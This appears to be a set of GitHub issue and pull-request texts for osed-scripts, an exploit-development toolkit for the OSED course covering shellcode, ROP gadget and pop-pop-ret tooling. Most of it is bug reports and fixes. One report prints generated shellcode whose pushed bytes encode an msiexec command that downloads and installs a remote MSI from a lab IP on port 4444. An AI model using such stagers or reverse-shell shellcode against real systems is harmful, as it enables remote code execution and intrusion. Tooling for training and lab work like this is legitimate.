Anyone else getting a crash in the shellcode generated by shellcoder.py (crash occurs in WSAStartup)...I am taking a closer look.

ws2_32!WSAStartup+0x86: 75e99d46 668903 mov word ptr [ebx],ax ds:002b:ffb4f2d4=????

My guess is that the undocumented WSAData (https://docs.microsoft.com/en-us/windows/win32/api/winsock/ns-winsock-wsadata) structure have changed. I'll try to compare the msf stagers with this shellcode to figure out whats broken.

The script assumes that its running on Linux, e.g. it downloads https://github.com/0vercl0k/rp/releases/download/v2-beta/rp-lin-x64

Unfortunately, the updated https://github.com/0vercl0k/rp/tree/next branch does not have official macOS binaries. The old master branch is pretty outdated and lacks features.

One solution could be to check the OS platform before download, and if it is macOS, use the macOS build. I can provide the binary if needed, and can be hosted in this repo.

This enables specifying that no bad characters exist by providing no arguments to the -b flag, e.g.,

$ python3 find-gadgets.py -f file.exe  -b

Prior to this patch, specifying an empty bad characters list was not possible because -b expected at least one argument. Specifying -b "" would yield wrong results. For example:

$ python3 find-gadgets.py -f QuoteDB.exe  -b ""

...
[+] running '/home/kali/.local/bin/rp-lin-x64 -r5 -f QuoteDB.exe --unique --bad-bytes=\x'
...

$ wc -l found-gadgets.txt                                        
1032 found-gadgets.txt

Note that rp-lin-x64 was invoked incorrectly with --bad-bytes=\x and only found 1032 gadgets. However, with this patch applied, 3081 gadgets are found:

$ python3 find-gadgets.py -f QuoteDB.exe  -b

[+] running '/home/kali/.local/bin/rp-lin-x64 -r5 -f QuoteDB.exe --unique'

$ wc -l found-gadgets.txt                                           
3081 found-gadgets.txt

The QuoteDB.exe binary is from https://github.com/bmdyy/quote_db

Hi, I implemented a shellcode generator with the reverse shell from the course and a custom msi stager (this thing needs around 130 bytes less space). It is not super clean, but it works. I hope you like it and will accept the pull request ;)

This supersedes Pull Request #20.

This changes the default value of the -b/--bad-chars flag to an empty list (previously ["00"]).

Prior to this patch, specifying an empty bad characters list was not possible because -b expected at least one argument. Specifying -b "" would yield wrong results. For example:

$ python3 find-gadgets.py -f QuoteDB.exe  -b ""

...
[+] running '/home/kali/.local/bin/rp-lin-x64 -r5 -f QuoteDB.exe --unique --bad-bytes=\x'
...

$ wc -l found-gadgets.txt                                        
1032 found-gadgets.txt

Note that rp-lin-x64 was invoked incorrectly with --bad-bytes=\x and only found 1032 gadgets. However, with this patch applied, 3081 gadgets are found:

$ python3 find-gadgets.py -f QuoteDB.exe

[+] running '/home/kali/.local/bin/rp-lin-x64 -r5 -f QuoteDB.exe --unique'

$ wc -l found-gadgets.txt                                           
3081 found-gadgets.txt

The QuoteDB.exe binary is from https://github.com/bmdyy/quote_db

In case of a misconfigured working environment, executing the script using Python 64-bit will raise OSError: exception: access violation writing when invoking RtlMoveMemory() API.

...
[+] Debugging shellcode ...
Traceback (most recent call last):
  File "C:\Users\tahai\code\osed-scripts\shellcoder.py", line 670, in <module>
    main(args)
  File "C:\Users\tahai\code\osed-scripts\shellcoder.py", line 597, in main
    ctypes.windll.kernel32.RtlMoveMemory(
OSError: exception: access violation writing 0x00000000E3030000

As a quick workaround we can add a check if test_shellcode parameter is set.

In case the tag format is not conform, the default one c0d3 would be used instead. This would also avoid KS_ERR_ASM_INVALIDOPERAND exception to occur.

Hey @epi052 ,

This is a quick fix to shellcoder.py's --msi mode. Currently, if you try to execute it, you get an error:

Traceback (most recent call last):
  File "/home/kali/Desktop/tools/osed-scripts/shellcoder.py", line 669, in <module>
    main(args)
  File "/home/kali/Desktop/tools/osed-scripts/shellcoder.py", line 538, in main
    encoding, count = eng.asm(shellcode)
  File "/home/kali/.local/lib/python3.9/site-packages/keystone/keystone.py", line 213, in asm
    raise KsError(errno, stat_count.value)
keystone.keystone.KsError: Invalid operand (KS_ERR_ASM_INVALIDOPERAND)

I've traced it to the fault instructions generated here:

   call_system:                         
       xor eax, eax                    ;
       push eax                        ;
mov al, 0x;push eax;mov ax, 0x;push ax;push dword 0x6e712f20;push dword 0x582f3434;push dword 0x34343a31;push dword 0x39312e39;push dword 0x33322e38;push dword 0x36312e32;push dword 0x39312f2f;push dword 0x3a707474;push dword 0x6820692f;push dword 0x20636578;push dword 0x6569736d;

Notice mov al, 0x are invalid instructions. These were generated by push_string function at this branch:

for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the left ofer instructions
        elif ((0 == i-1) and ((i % 8) != 0) and rev_hex_payload_len != 8):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True

Presumably, the check elif ((0 == i-1) and ((i % 8) != 0) and rev_hex_payload_len != 8) is meant to catch strings of length multiple 8 and thus do not have any left over instructions. However, rev_hex_payload_len != 8 only catches the case 8, when it should be (rev_hex_payload_len % 8) != 0 to catch all multiples of 8. This led to the invalid opcodes being generated.

With this one liner change, the --msi generation now works properly. I've re-tested both generation modes to ensure they still work on Windows as expected.

Thanks!

Hey @epi052 !

I noticed the find_ppr script has a hard coded set of BADCHARS, which might not be applicable to all targets. Rather than manually modifying it each time, I made badchars a command-line argument so it can be set dynamically. Additionally, I moved modules from a positional argument to a flag in order to support this. The new usage is:

find-ppr.py [-h] [-s] [-b BAD [BAD ...]] -m MODULES [MODULES ...]

Hope this is useful, thanks!

A duplicate of #15 with additional commits that automatically address incorrect style, created by Restyled.

:warning: Even though this PR is not a Fork, it contains outside contributions. Please review accordingly.

Since the original Pull Request was opened as a fork in a contributor's repository, we are unable to create a Pull Request branching from it with only the style fixes.

The following Restylers made fixes:

• autopep8
• black
• isort
• yapf

To incorporate these changes, you can either:

1. Merge this Pull Request instead of the original, or

2. Ask your contributor to locally incorporate these commits and push them to the original Pull Request

   Expand for example instructions

   ```console
   git remote add upstream https://github.com/epi052/osed-scripts.git
   git fetch upstream pull/<this PR number>/head
   git merge --ff-only FETCH_HEAD
   git push
   ```
   

NOTE: As work continues on the original Pull Request, this process will re-run and update (force-push) this Pull Request with updated style fixes as necessary. If the style is fixed manually at any point (i.e. this process finds no fixes to make), this Pull Request will be closed automatically.

Sorry if this was unexpected. To disable it, see our documentation.

A duplicate of #13 with additional commits that automatically address incorrect style, created by Restyled.

:warning: Even though this PR is not a Fork, it contains outside contributions. Please review accordingly.

Since the original Pull Request was opened as a fork in a contributor's repository, we are unable to create a Pull Request branching from it with only the style fixes.

The following Restylers made fixes:

• autopep8
• black
• isort
• prettier-markdown
• reorder-python-imports
• yapf

To incorporate these changes, you can either:

1. Merge this Pull Request instead of the original, or

2. Ask your contributor to locally incorporate these commits and push them to the original Pull Request

   Expand for example instructions

   ```console
   git remote add upstream https://github.com/epi052/osed-scripts.git
   git fetch upstream pull/<this PR number>/head
   git merge --ff-only FETCH_HEAD
   git push
   ```
   

NOTE: As work continues on the original Pull Request, this process will re-run and update (force-push) this Pull Request with updated style fixes as necessary. If the style is fixed manually at any point (i.e. this process finds no fixes to make), this Pull Request will be closed automatically.

Sorry if this was unexpected. To disable it, see our documentation.

Usage: python string-to-shellcode.py

The last step ("push esp") is to push the pointer pointing to the created string to the stack, just pop to another registry if temporary storage is needed.

Reference: https://github.com/tyhk/String-Shellcode-Generator